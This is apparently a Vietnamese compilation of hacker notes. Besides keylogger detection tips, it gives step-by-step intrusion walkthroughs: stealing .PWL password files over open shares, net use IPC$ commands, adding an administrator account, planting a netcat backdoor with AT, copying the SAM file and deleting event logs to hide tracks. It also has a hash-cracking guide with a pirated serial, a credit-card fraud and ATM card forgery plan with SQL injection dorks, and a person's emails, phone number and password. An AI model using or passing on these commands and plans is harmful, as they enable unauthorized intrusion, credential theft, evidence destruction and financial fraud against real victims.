Phần mềm và công dụng
1. Ent3 (essential nettools): dò tìm xâm nhập máy tính(khi biết ip)
2. Passwordspro: giải mã pass bị mã hóa
3. perfect keylogger: Tạo virus trojan gián điệp chụp lại ảnh của máy
victim
4. antikey: phần mềm diệt virus trojan gián điệp
5. Cain: dò tìm ip để lấy username và pass
6. Havij: Dò tìm lỗi của cơ sở dữ liệu (SQL)
2. Cách phòng chống.
*******Bây giờ là cách phát hiện keylog
không bị khóa acc thì chít*******
-. Với Perfect keylogger : 1. Vào mục Start -> Run gõ : cmd 2. Ở màn hình Dos gõ : tasklist /m bpkhk.dll Nếu không có Keylogger bạn sẽ nhận được 1 thông báo lỗi : INFO: No tasks running with the specified criteria. Nếu có Keylogger màn hình sẽ hiển thị : Image Name PID Modules Diễn giải ================ ==== ===== ====== ========= explorer*************** 468 bpkhk.dll <--- quen thuộc DUMeter*************** 1444 bpkhk.dll <--- quen thuộc ctfmon*************** 1548 bpkhk.dll <--- quen thuộc acrotray*************** 1820 bpkhk.dll <--- quen thuộc notepad*************** 1956 bpkhk.dll <--- quen thuộc firefox*************** 2012 bpkhk.dll <--- quen thuộc bdmcon*************** 1744 bpkhk.dll <--- quen thuộc TOTALCMD*************** 2396 bpkhk.dll <--- quen thuộc bpk*************** 1620 bpkhk.dll <--- nó đây rồi ( chứng tở máy bạn đã dính perfect key ) +. Với Easy Key: 1. Vào mục Start -> Run gõ : cmd 2. Ở màn hình Dos gõ : tasklist /m Ekey.dll Nếu không có Keylogger bạn sẽ nhận được 1 thông báo lỗi : INFO: No tasks running with the specified criteria. Nếu có Keylogger màn hình sẽ hiển thị : Image Name -------- PID -- Modules ----- Diễn giải ================ ==== ===== ======== TOTALCMD*************** ----- 2040 ----- ekey.dll <--- quen thuộc Easy Keylogger*************** -- 2340 ----- ekey.dll <--- nó đây rồi ( máy bạn đã dính Easy Key) ****** Thêm Cách Diệt Cho Nó Đủ Bộ Nhá  *********+, Với Perfect Key 1. Vào mục Start -> Run gõ : cmd 2. Ở màn hình Dos gõ : taskkill /f /im bpk*************** /t 3. Tắt tất cả các chương trình đang chạy hiện thời (Explorer***************, bdswitch***************, DUMeter*************** ...) 4. Mở Explorer vào thư mục Windows\System32 xóa các tập tin bpk***************, bpkhk.dll, bpkwb.dll ... Đã xong +. Với Easy Key 1. Vào mục Start -> Run gõ : cmd 2. Ở màn hình Dos gõ : taskkill /f /fi "pid ge 2340" /im * Đã xong Lưu ý 1 chút đó là BPK có cho phép đổi tên các file bpk***************, các file .dll... nên khi các bạn không thấy file bpk*************** và bpk*.dll thì vẫn chưa thể yên tâm là trong máy ko có BPK
PHẦN MỀM CHỐNG VIRUS KEYLOG CỰC KỲ HIỆU QUẢ VÀ GỌN NHẸ -
ANTI-KEYLOGGER
Anti-KeyLogger với những tính năng độc nhất vô nhị bao gồm hoạt
động ở chế độ nền, tự động tắt kích hoạt mọi cơ chế ghi phím và còn ngăn chặn
thành công tình trạng KeyLogger thâm nhập...
Phần mềm chốngVirus KeyLog cực kỳ hiệu
quả và gọn nhẹ - Anti-KeyLogger
Trong
thời gian gần đây, vấn nạn đạo tặc số đang có dấu hiệu leo thang, khiến cho cả
người dùng máy tính lẫn các công ty chuyên viết phần mềm an ninh máy tính gặp
phải không ít vất vả. Phổ biến nhất trong số này vẫn là sự tấn công của những
trình ghi phím (chủ yếu là để lấy cắp password) thường được tin tặc lén lút cài
đặt lên máy tính của người dùng trong lúc họ đang mải mê duyệt web.
Nhằm giúp
người dùng máy tính có trình độ hiểu biết hạn chế về bảo mật, MyPlanet Software vừa công bố
miễn phí công cụ phòng chống KeyLogger nhỏ nhất thế giới mang tên
Anti-KeyLogger với
những tính năng độc nhất vô nhị bao gồm hoạt động ở chế độ nền, tự động tắt
kích hoạt mọi cơ chế ghi phím và còn ngăn chặn thành công tình trạng keylogger
thâm nhập vào clipboard để ghi trộm những thông tin nhạy cảm. Ngoài ra, bạn
cũng không cần phải cài đặt khi muốn sử dụng công cụ này.
Để kích
hoạt công cụ này, bạn chỉ cần xả nén tập tin aklog.zip vừa được tải về rồi bấm
đôi chuột vào tập tin aklog.exe. Hộp thoại MyPlanetSoft.com Anti-Keylogger sẽ
xuất hiện. Hãy bấm nút OK hai lần để kích hoạt chương trình. Kể từ thời điểm
này, chương trình sẽ hoạt động ở chế độ nền (ẩn) và tự động tắt kích hoạt mọi
cơ chế ghi phím (nếu có) của những phần mềm gián điệp. Nếu muốn tắt kích hoạt
Anti-Keylogger, bạn chỉ cần khởi động lại chương trình rồi bấm nút OK hai lần
để hoàn tất mọi thay đổi.
|
|||||
25Jun.2010
Tác giả: admin Phân
loại:Hacking - Exploit ThuộcTự
viết
 Lớn | Vừa | Nhỏ  
Sau khi nhiều
người tìm ra pass của admin dạng Hash mà không biết làm gì ! vì không giải mả
được nên dành chấp nhận về không !
Giải quyết vấn đề này tui viết bài hướng dẩn các bạn sữ dụng công cụ crack password tuyệt vời này PassWordPro 2.4.4.0 Công cụ này sẽ giúp bạn crack pass tất cả các dạng pass đã được mã hóa Ở đây tui hướng dẩn crack pass của Vbb tất cả các Version Trước hết bạn phải biết cách mã hóa của vbb là Code: $Pas=md5(md5($Password).$salt); Trong đó Password là pass của người dùng còn salt trong vbb là random 3 ký tự bất kỳ Pas sẽ được lưu trong cơ sở dữ liệu của trang web. vì dạng pass được mã hóa dưới dạng md5 thì hầu như chưa có thuật toán nào giải mã được, có chỉ là dò từng pass Để giả mã pass trong vbb ta cần có $Pas và $salt hai cái này có thể tìm thấy trong data của Victim Trích: VD Tui có $salt=’abc’; $pas=’ac58bf0b0a8f3e79213389d1a9a4372c’; right click chon add.. Hash nhập ac58bf0b0a8f3e79213389d1a9a4372c salt nhập abc Type of hash chọn: md5(md5($Pass).$salt)[php] các thông tin khác với vbb thì không cần nhập Nhấn add. Sau đó thiết lập các tùy chọn cho công việc giả mã; Ở đây có các kí tự: chử thường, chử hoa, số, kí tự đặc biệt.. Độ dài hay ngắn của pass: thông thường từ 4 đên 10 là đủ rồi Tùy mức độ pass của victim dài hay ngắn mà thời gian tìm lâu hay không. nếu pass có chử thường và hoa và số, có độ đài 10 ký tự tìm tốn khoản 20 năm với tốc độ tìm 6 000 000 đến 7 000 000 /giây Hy vọng các bạn chờ được Thành công đây Một sô lưu ý:
Đối với các mã
nguồn khác các bạn củng là tương tự, chọn đúng loại và có thời gian chờ thì sẽ
ra
 Xem thêm tại: http://longtu8x.net/blog/read.php?19#ixzz37kYrpf1B
Phần mềm có thể dò password tất cả các kí tự từ A – Z, a – z, 1 – 9, các kí tự
đặc biệt, space, printable...
Link download:
http://d.turboupload.com/d/2052487/Installsickpass.exe serial: ARPR-83296730531875-CBBVYBXFEXDEVPMB
Hướng dẫn code giải mã pass
bị mã hóa
Giả
sử rằng bạn đã quên mật khẩu dùng để mã hoá dữ liệu thành “0x01000000F75D553409C74570F6DDBCADA53FD489DDD52D9277010050565ADF30F244F8CC”.
Chúng ta có thể truy tìm lại được mật khẩu và dữ liệu đã bị mã hoá bằng thủ tục
sau
use master
go select getdate() as StartingTime go declare @myencryptedtext varbinary(max) set @myencryptedtext=0x01000000F75D553409C74570F6DDBCADA53FD489DDD52D9277010050565ADF30F244F8CC print @myencryptedtext exec hack_encryption @encryptedtext=@myencryptedtext go select getdate() as EndingTime go
Kết
quả
StartingTime ----------------------- 2007-12-18 18:24:10.843 0x01000000F75D553409C74570F6DDBCADA53FD489DDD52D9277010050565ADF30F244F8CC This is the Encrypted text: MAK The actual data is :123456789 |
|||||
Xâm nhập máy tính khi biết private ip (hay ip client)
1.Xâm nhập
Xâm nhập máy tính đang Online là một kỹ thuật vừa dễ lại vừa khó . Bạn có thể nói dễ khi bạn sử dụng công cụ ENT 3 nhưng bạn sẽ gặp vấn đề khi dùng nó là tốc độ sử dụng trên máy của nạn nhân sẽ bị chậm đi một cách đáng kể và những máy họ không share thì không thể xâm nhập được, do đó nếu họ tắt máy là mình sẽ bị công cốc khi chưa kịp chôm account , có một cách êm thấm hơn , ít làm giảm tốc độ hơn và có thể xâm nhập khi nạn nhân không share là dùng chương trình DOS để tấn công . Dùng chương trình scan IP như ENT 3 để scan IP mục tiêu . --->>Các bước thực hiện: (1). Vào Start ==> Run gõ lệnh cmd . (2). Trong cửa sổ DOS hãy đánh lệnh “net view ” + VD : c:\net view 203.162.30.xx (3). Bạn hãy nhìn kết quả , nếu nó có share thì dễ quá , bạn chỉ cần đánh tiếp lệnh net use <ổ đĩa bất kỳ trên máy của bạn> : <ổ share của nạn nhân> + VD : c:\net use E : 203.162.30.xxC (4). Nếu khi kết nối máy nạn nhân mà có yêu cầu sử dụng Passwd thì bạn hãy download chương trình dò passwd về sử dụng ( theo tôi bạn hãy load chương trình “pqwak2” áp dụng cho việc dò passwd trên máy sử dụng HĐH Win98 hoặc Winme và chương trình “xIntruder” dùng cho Win NT ) . Chú ý là về cách sử dụng thì hai chương trình tương tự nhau , dòng đầu ta đánh IP của nạn nhân , dòng thứ hai ta đánh tên ổ đĩa share của nạn nhân nhưng đối với “xIntruder” ta chú ý chỉnh Delay của nó cho hợp lý , trong mạng LAN thì Delay của nó là 100 còn trong mạng Internet là trên dướI 5000 . (5). Nếu máy của nạn nhân không có share thì ta đánh lệnh : net use <ổ đĩa bất kỳ trên máy của bạn> : c$ (hoặc d$Nháy mắt"administrator" + VD : net use E : 203.162.30.xxC"administrator" Kiểu chia sẽ bằng c$ là mặc định đối với tất cả các máy USER là "administrator" . 2. ENT3 Essentail Nettools (ENT3) Home: http://www.tamos.com/products/nettools/ Download: http://www.tamos.com/files/ent3.zip sau khi unzip và setup , mở công cụ Essential NetTools và click vào phần NNBScan . trong phần Starting Ip gõ 2 lớp đầu là 203.162 ( đây là lớp IP của việt nam) sau đó tuỳ thuộc vào muốn scan tỉnh nào mà bạn gõ lớp thứ 3 vào ( ví dụ của sài gòn thường co' lớp thứ 3 là 9,8,11,12,13,14... của hà nội thường có lớp thứ 3 là 19,25,27,29,31... còn lớp thứ 4 bạn gõ số 1 Phần Ending Ip gõ 3 lớp đầu như trên nhưng lớp thứ 4 gõ số 255. Sau khi scan xong phần RS các bạn sẽ thấy nhưng IP mà công cụ này scan được, nếu phần RS báo Yes thì có nghiã là máy tính đó có khả năng vào được còn No thì máy tính đó khó có khả năng vào được ,tìm một PC có khả năng vào được rôi click chuột phải vào Ip của PC đó, tiếp theo click vào open computer , rồi view ổ C:\ sau đó view tiếp thư mục windows : sau khi view được thư mục windows, tìm những file .PWL, một máy có thể có nhiều file này ! cố gắng tìm hết chúng và coppy về máy tính của bạn ,có thể còn nhiều file .PWL khác trong thư mục windows này, bạn có gắng đừng bỏ xót ! Sau khi coppy về máy của bạn click trực tiếp vào ( chạy luôn bằng chương trình PWLTools ) , ví dụ với cái asean thấy màn hình báo như vậy là trong file này không có gì cả ! cố gắng thử với những file PWL khác, nếu may mắn bạn sẽ có account hiện ra thông thường khi view máy của ai đó đang online sẽ rất chậm, với 1 modem 56k motorola trong bạn phải mất 3 phút trung bình để view 1 thư mục và ngoài ra không làm được việc gì ! biết làm sao được vì thành công chỉ đến với những kẻ biết cách chờ đợi ! chúc các bạn hack vui vẻ một số chú ý quan trọng khi hack acc dành cho những bạn đã biết hack : 0/ cách này chưa test với cilent ngoài hàng cafe internet 1/ khi view PC của ngưới khác máy của người đó sẽ chậm đi rất nhiều, do đó phải thao tác thật nhanh chóng hiệu quả, với những PC có nhiều file PWL nên chọn tất cả bằng phím Ctrl sau đó nhấn phím Ctrl+C để copy, minimize thư mục winsows của máy victim sau đó chọn 1 folder rồi nhấn Ctrl+V để paste ! những chú ý tuy rất nhỏ nhưng sẽ giảm được nhiều thời gian hơn, thử coi ! 2/ nếu nhìn thấy victim không setup notron-antivirus bạn có thể coppy server của sub7 ( hay của một con trojan khác ) vào bất kì thư mục nào sau đó edit file AUTOEXEC.BAT sao cho khi khởi động máy sẽ load luôn cả server của sub7, sau đó scan bất kỳ lúc nào để đièu khiể máy victim bằng cilent 3/ khi được ngồi máy chủ của 1 cửa hàng internet nào đó có thể vào dialup để soi password connect bằng công cụ Revelation đã được giới thiệu trên site ( nếu có save password ) hoặc xài công cụ SHOWPASS nếu server xài windows 98,95,me, công cụ này cũng đã được giới thiệu trên website, hoặc cũng có thể cài backdoor vào 4/ 1 cách khác lấy luôn tất cả pw là xài công cụ pwltool demo ( chứ không phải PWLTools-6.51 đâu nha ) sau khi chạy công cụ này click vào tab tool -->Additional password , sau đó click tiếp tab Secret exploer để view tất cả connection |
|||||
lick vào đây để lấy những
công cụ cần thiết nha!
http://www.hvnh.edu.vn/modules.php?name=Forums&file=viewtopic&topic=48&forum=17 Xâm nhập vào máy tính của Victim đang Online bằng chương trình Essential NetTools : - Đầu tiên các bạn phải Download chương trình Essential NetTools : Essential Net Tools 3.0 và *** của nó Rồi thực hiện các bước sau : + Giải nén files Essential Net Tools 3.0.zip bằng các công cụ giải nén như : Winzip, Winrar... Download tại : http://www.winzip.com/ Bước 1 : Thiết lập cấu hình - Bạn vào trong Control Panel rồi vào Network - Click vào nút Add rồi chọn phần Client - Tiếp tục nhấn nút Add. Rồi chọn phần Microsoft - Chọn phần Client for Microsoft Network - Cuối cùng là OK Bước 2 : Bắt đầu xâm nhập + Ngay phần NBscan ngay phần" Starting IP": Đánh vào IP của bạn. Để biết số IP của bạn thì vào Start --> Run rồi gõ : "winipcfg" VD : 203.162.11.1 hoặc : 202.167.122.1 Còn phần Ending Ip : 203.162.11.255 hoặc : 202.167.122.225 + Sau đó click chuột vào nút Start + Chờ sau giây lát ! Nó sẽ xuất hiện danh sách IP sau khi dò tìm ! +Ngay phần RS: No : là không có xâm nhập vào được Yes: là xâm nhập được (nhưng đôi khi thì không) + Nhấp chuột phải vào hàng mà có chữ "Yes" - Nhấp vào phần "Open Computer" + Và sau đó các bạn có thể xâm nhập vào máy của victim được nhưng cũng có thể có mấy cái máy không xâm nhập vào được ! Nhưng đột nhập để làm gì ? Chúng ta đột nhập để ăn cắp Acount và dữ liệu của victim ! Ắn cắp Password bằng cách lấy files PWL của victim trong : C:/window/*.PWL Rồi dùng công cụ PWL Tool để đọc được file đó Các lệnh cơ bản xâm nhập máy tính Phần 1 : Net chỉ cần bạn có được User và Passwords của một IP nào trên Net...thế là bồ có thể kết nói một IPC$ rỗng rồi đấy.... bây giờ tớ xin ví dụ là bạn có được User la hbx và passwords : 123456...IP : 127.0.0.1 cậu hãy mở trình Ms dos và gõ vào lệnh sau : Net use \\127.0.0.1\ipc$ "123456" /user:"hbx" đẩ kết nồi một IPC$ rỗng với máy victtim nhưng thao tác tiếp theo..bạn nhất thiết phải login xong mới có thể sử dụng ------------------------- bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới nghe... chúng ta cộng thệm môt user mới là heibai và password lovechina Net user heibai lovechina / add nếu bạn thành công..thì có thể cộng user này vào nhom Adminstrator Net Localgroup Adminstrator heibai / add ------------------------- trong phần này tớ hướng dẫn tạo một ổ đỉa Ảo trên computer Net use z: \\127.0.0.1\C$ ( hoặc là IPC$ ) Z là của mình...còn C$ là của Victim Phần 2 : AT thông thường thì khi độp nhập vào máy tính..chúng ta sẻ tặng quà lưu niệm cho victim trước khi rút lui,....vậy khi copy trojan lên máy rồi...làm thế nào dể khới động nó đây ? chúng ta phải dùng đến lệnh AT thôi..... đầu tiên...chúng ta cần biết thời gian của đối phương Net time \\127.0.0.1 bây giờ thì nó sẽ phản hồi thời gian của victim...vd : 12:0 .. tiếp theo..chúng ta cần tạo môt homework ID = 1 AT \\127.0.0.1 12:3 nc.exe ở đây giả thiết là tui có con trojan la Nc.exe và đã được copy lên máy victim rồi * giới thiệu chút it về NC...NC là từ viết tắc của NETCAT....nó là một telnet server với port 99 đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99..thế là xong phần lưu bút phần 3 : Telnet đây là một lệnh rất cần thiết khi xâm nhập máy tính...nó có thể kết nối vớ máy tính khắc từ xa..nhưng thường thi phải có I D & PW..nhưng nếu máy đã Ăn Đạn rồi thì bạn chỉ cần connected đến port 99 là ok Telnet 127.0.0.1 99 thế là bồ đã kết nối đến port 99 và có thể thực hiện tất cả các lệnh... Phần 4 : Copy bây giờ chúng ta nói tiêp...làm thế nào để copy files trên máy mình lên máy victim và làm ngược lại....nhưng bạn phải có kết nối IPC$ cái đã.... chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1 Copy Index.html \\127.0.0.1\C$\index.html nếu bạn copy lên folder winNt Copy index.html \\127.0.0.1\admin$\index.html muốn copy files trên máy victm thì bạn gõ vào : Copy \\127.0.0.1\Admin$\repair\sam._c:\ phần 5 : Set nếu bạn muốn *** một website......tất nhiến là phải mở port 80..nếu không thì cậu *** cho ai xem ? đã tới lúc dùng lệnh Set rồi sau đây là kết quả mà tớ tìm thấy......chúng ta phân tích nghe....chủ yếu là muốn biêt homepage nó ở đâu thôi..... COMPUTERNAME=PENTIUMII ComSpec=D:\WINNT\system32\cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=*/* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST= DAY LA SO IP CUA TUI..NHUNG TUI DEL ROIHTTP_ACCEPT_ENCODING=gzip, deflate HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS=1 Os2LibPath=D:\WINNT\system32\os2\dll; OS=Windows_NT Path=D:\WINNT\system32;D:\WINNT PATHEXT=.COM;.EXE;.BAT;.CMD PATH_TRANSLATED=E:\vlroot DAY LA URL CUA HOMEPAGE, CHI CAN NHIN SAU DONG PATH_TRANSLATED= LA BIET NO O DAU 。O DAY LA E:\vlroot PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0303 PROMPT=$P$G QUERY_STRING=/c+set REMOTE_ADDR=XX.XX.XX.XX REMOTE_HOST=XX.XX.XX.XX REQUEST_METHOD=GET SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe SERVER_NAME=XX.XX.XX.XX SERVER_PORT=80 SERVER_PORT_SECURE=0 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=Microsoft-IIS/3.0 SystemDrive=D: SystemRoot=D:\WINNT TZ=GMT-9 USERPROFILE=D:\WINNT\Profiles\Default User windir=D:\WINNT đây là cách khá ngu..nhưng chỉ có cách này mới 100% biết đuợc homepage tên gì..ở ảâ ? khi cậu Dir ..chắc chắn là sẽ View được rất nhiều files đấy`..... phần 6 : Nbtstat nếu cậu Scan đuợc một máy sữ dụng Winnt...open port 135-139...thế thì bồ phải dùng lệnh này để biết thêm user thôi... * tiện thể xin nói luôn...đây là netbios....sau khi có user rồi bạn có thể đoán mò password..nếu không thi Cracking luôn đi Nbtstat - A XXX.XXX.XXX.XXX sau đây là kết quả tớ scan được..... NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered MAC Address = 00-E0-29-14-35-BA PENTIUMII <00> UNIQUE PENTIUMII <20> UNIQUE ORAHOTOWN <00> GROUP ORAHOTOWN <1C> GROUP ORAHOTOWN <1B> UNIQUE PENTIUMII <03> UNIQUE INet~Services <1C> GROUP IS~PENTIUMII...<00> UNIQUE ORAHOTOWN <1E> GROUP ORAHOTOWN <1D> UNIQUE ..__MSBROWSE__.<01> GROUP kết quả cho biết User là PENTIUMII。 phần 7 : Shutdown nhìn lệnh thôi cũng đủ biết rồi phải hông ? đây là lệnh shutdown server Winnt Shutdown \\127.0.0.1 t:20 20 giây sau...Winnt sẽ tự khời động lại.......hi vọng các bạn suy nghỉ kỷ trước khi dùng lệnh này....vì nó sẽ làm tổn thất rất nặng cho victim...hãy làm tay hacker có đạo đức phần 8 : Dir.... lệnh này không có gì để nói hết..chỉ dùng để view thôi................. phần 9 : Del lệnh này giống như xoá nhật ký vậy đó.....khi chúng ta xâm nhập máy tình...trên hệ thống sẽ lưu lại thông tin của chúng ta..vì thế..nên del nó đi...chư muốn bị tóm cổ hả ? sau đây là những files nhật ký của Winnt del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log chỉ cần del hết là coi như xong
bổ xung thêm
Bổ xung thêm
|
|||||
Tìm hiểu về mạng
nền tảng mạng, lập trình hệ thống, sau đó học thêm các phương thức thâm nhập căn bản.
mỗi máy tính có duy nhất một địa chỉ MAC
- Trang tìm vị trí, id: http://whois.domaintools.com
- IP Add = địa chỉ nhà Nhà thì lúc nào cũng khóa cửa => xâm nhập <=> phải mở được khóa 1. Hợp lệ : Có chìa khóa do chủ nhà cấp <=> Username & Pass 2. Bất hợp lệ : Cạy cửa <=> bẻ khóa a. Xác định rõ kiến trúc nhà xem có bao nhiêu cửa, gỗ hay bêtông, có lỗ thủng nào không, cửa sổ có khóa không để chui vào <=> Xác định HĐH hệ thống = quét Banner, tìm các lỗ hổng bảo mật trên mạng xem đã fix chưa (theo từng hệ thống khác nhau) Nếu Admin làm biếng chưa fix => May mắn, cứ thế mà chui lỗ chó vào. Nếu đã fix các lỗi => chỉ còn cách bẻ ổ khóa mà vào b. Xáx định rõ loại ổ khóa cần bẻ: Bảo mật kém : Nó xài khóa TQ, cứ lựa đại chìa có sẵn mà kiểm thử <=> Admin lơ là xài pass dễ đoán wa'. (sử dụng Tool quét pass theo Dictionary) Bảo mật tốt : Sử dụng khóa tốt, nhiều lớp cửa, có bầy chó Becgiê canh chừng, hệ thống hồng ngoại.... hic <=> Admin đã điều chỉnh các thông số default, pass khó đoán và được mã hóa tốt, sử dụng firewall nhiều tầng, hệ thống phát hiện xâm nhập IDS.... => |o| he he Nếu kỹ năng + kỹ thuật tốt mà chui vào được => Muốn đập phá cứ đập phá (del data, deface), muốn chôm đồ cứ chôm đồ(copy data), muốn làm nơi ăn nhậu cứ ăn nhậu (bruteforce)..... (C15 tóm cổ). Nếu không muốn bị tóm thì đừng phá phách. Người thông minh: Lặng im quan sát, khi rời khỏi lau sạch dấu vết (xóa dấu chân, dấu vân tay) <=> xóa tất cả log có liên quan trong hệ thống. Đục 1 lỗ phía sau tường để sau này muốn vô ngủ không cần phải chìa khóa (cài Backdoor Trojan mở port để có thể Telnet) hoặc tạo cho mình một chìa khóa hợp lệ (add Account của mình vào hệ thống). Kẻ lóc chóc: quậy phá tùm lum, để dấu vết tá lả cho C15 túm cổ. Kỹ năng cần có: 1. Hiểu biết cặn kẽ về hệ thống và các dịch vụ trên hệ thống (tối thiểu Win và Linux) 2. Hiểu rõ về TCP/IP cũng như các Protocol khác 3. Có kỹ năng lập trình
Email và điện thoại
Email chính
nguyennghia271292@gmail.com
Email phục hồi
vnghia665@yahoo.com
Điện thoại
0164 750 6602
pass: 0985749241
Kế hoạch hack
Chuẩn bị
- Lấy cấp thông tin, thẻ tín dụng người nước ngoài
- Rao bán thông tin trên mạng/ mua bán thông tin tài khoản tín dụng
- Diễn đàn chuyên trộm cấp cc của người nước ngoài
- Có cc, mua hàng trên các trang: newegg.com, walmart.com,
bnamin.com
- Ship hàng về vn, tự ship hoặc thuê người ship
- Công ty vận chuyển như mubangiaonhan.com, nhapre.com, giaonhan247.com…
- Hack tài khoản, american express, visa, VHF, HVF, HVA
- Bán hàng qua mạng (gửi con trojan)
- Hack credit card
- Cách làm cashout
- Tổ chức làm giả thẻ ATM; công đoạn dập thẻ ATM
- Diễn dàn hacker thế giới
- Máy tạo thẻ ATM có tên ABS ATM card holder (máy ABSR), bán máy ABS ATM
card holder; có bán kèm phôi thẻ ATM để in dập thẻ mới
- dây chuyền công nghệ sản xuất thẻ ATM
- Các tay casher việt nam: chuyên
gia” spamer, casher người Việt hora_, tuanpham_, blackcash_, tntr_,
gonewiththe_, seam_, secretma_,tieukhucb_, tayninhb_,…
- Máy in 3D ATM
- tìm hiểu RBS Worldpay
- Thiết bị in thẻ
Nguồn : http://kenhvietnam.blogspot.com/2013/03/vong-xoay-ug-tam-su-cua-1-hacker.html#ixzz37YomGBnX
Trang chủ : http://kenhvietnam.blogspot.com.
- Tìm hiểu về deepweb
- Tìm hiểu rum UG
- tìm hiểu HKV, VSB, vnunder, checker; reg domain free; www.vietworm.net (bên paypal); VHC
(vietnamese hacker community); HVA(
- Từ khóa tìm lỗi SQL: shopdisplayproducts.asp?id hoặc
shopaddtocard.asp?catologid=
Các trang khác
- Trang dò IP: http://www.ip-adress.com/
- Tải phần mềm dò cc chết hay sống : http://www.apple.com/itunes/download/
- Trang bán cc : http://diendancongty.com/forum/threads/109394-sellerbestcvv-Worldwide-CVVs-Shop-Auto-2424-Good-Cheap-SELL-CCV-UG-TEAM.dvct
- Search shop vào trang : nhacpro.biz
Inurl: event.php?id= sẻ là dork
Vd : inurl : productinfo.php ? id=73 (73 là số tùy ý bạn
chọn)
- google dork
- Google shop v1.0
Không có nhận xét nào:
Đăng nhận xét